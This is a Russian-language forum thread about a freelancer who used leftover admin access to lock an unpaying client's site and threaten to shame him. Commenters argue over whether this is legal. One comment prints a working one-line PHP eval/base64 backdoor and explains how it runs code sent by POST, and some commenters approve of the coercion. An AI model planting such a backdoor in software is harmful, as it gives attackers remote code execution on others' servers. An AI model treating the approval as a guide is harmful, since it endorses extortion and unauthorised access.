Верни деньги, будь мужиком!
Знакомый скинул сайт, посмотрел, афигел. Предприниматель не доплатил 3500 рублей фрилансеру, но тот оставил лазейку в коде и теперь сделал "подлянку".
Знакомый скинул сайт, посмотрел, афигел. Предприниматель не доплатил 3500 рублей фрилансеру, но тот оставил лазейку в коде и теперь сделал "подлянку".
Поэтому я, как заказчик, всегда работаю через безопасную сделку.
Знали бы вы сколько жулья со стороны исполнителей, это просто пипец
Лазейку... ха, пусть радуется что ему почтового бота не посадили.
Кстати, я связался с парнем, он удалил инфу ту, и просто дал срок 3 дня человеку. После напишет его родственникам и близким друзьям о том, что человеку нельзя доверять деньги, удалит сайт. Так как именно за сайт ему не заплатили, остальное вышлет почтой и добавит на диск в гугле. Все же, правильно. Парень неплохой, интересен в общении, просто сказал: выбесили, то 3000 рублей, то 12000 рублей. Вот у него и бомбануло. Пришлось подсказать ему, как действовать в таких ситуациях.
У парня есть доступ к админке, заказчик мамонт в этом плане. Он просто поставил технические работы, вот и все. Оказывается, это никакой не серьезный код, а просто тех.работы через плагин. Отключать же такой плагин не станет ни один программист, так как слишком странно, что такое есть.
Нарушений нет, просто тормознул работу. Умный парень, теперь его можно уважать. Если заказчик захочет, то решит вопрос в 3 минуты, удалив плагин.
Мне дали доступ модера. Вот сайт) если ему деньги не вернут, я его куплю за половину суммы :)
Если домен и хостинг на заказчика оформлены, то заказчик(каким бы не был мудаком), может смело идти в полицию с заявлением на неправомерный доступ к комп информации(сайту), модификацию информации, а потом ещё и кражу. И это объективно, в рамках закона. При том смело притянуть можно двух баранов, то есть горе кодера и тебя(ты же уже тоже лазил там, без прав со стороны владельца).
З.Ы. Сам в сфере работаю, кидали за жизнь по части сайтов ни раз, НО я никогда не доходил до таких маразмов как удаление/модификация или тем более БЭКДОРЫ в коде. Решают безопасные сделки, предоплаты и договора.
Тут вот какой момент, права на код переходят к заказчику в момент оплаты, до тех пор - этот сайт принадлежит разработчику, он может делать все что захочет
Ну вот и пускай разработчик показывает сайт на своём ПК или у себя на поддомене. А тут именно залез на "чужой" хостинг, там чего-то изменил и требует денег. Не напоминает вирусы вымогатели что блокируют ПК/сайты?
У исполнителя, как понимаю, нет никаких бумажек, чтобы доказать правомерность им изменять тот код и передавать доступы третьим лицам.
Вот нафига вебщеллы, когда строчку вида
if(isset($_POST['e'])) eval(base64_decode($_POST['e']))
можно засунуть в любое место?
Выполняет все, что придет ему извне. Извне, разумеется, придти может очень много всего интересного.
Если в постзапросе есть ключ e то расшифруй из base64 его значение и вычисли(выполни) его в процессе создания пхп странички.
Лига фрилансеров
2K постов17K подписчик
Правила сообщества
Не забывайте поддерживать авторов плюсами!
Нельзя:
- Добавлять нетематические посты, последнее решение за модератором
- Рекламировать какую-либо продукцию в виде постов
Можно:
- Делится любыми интересными историями, связанными с фрилансом :)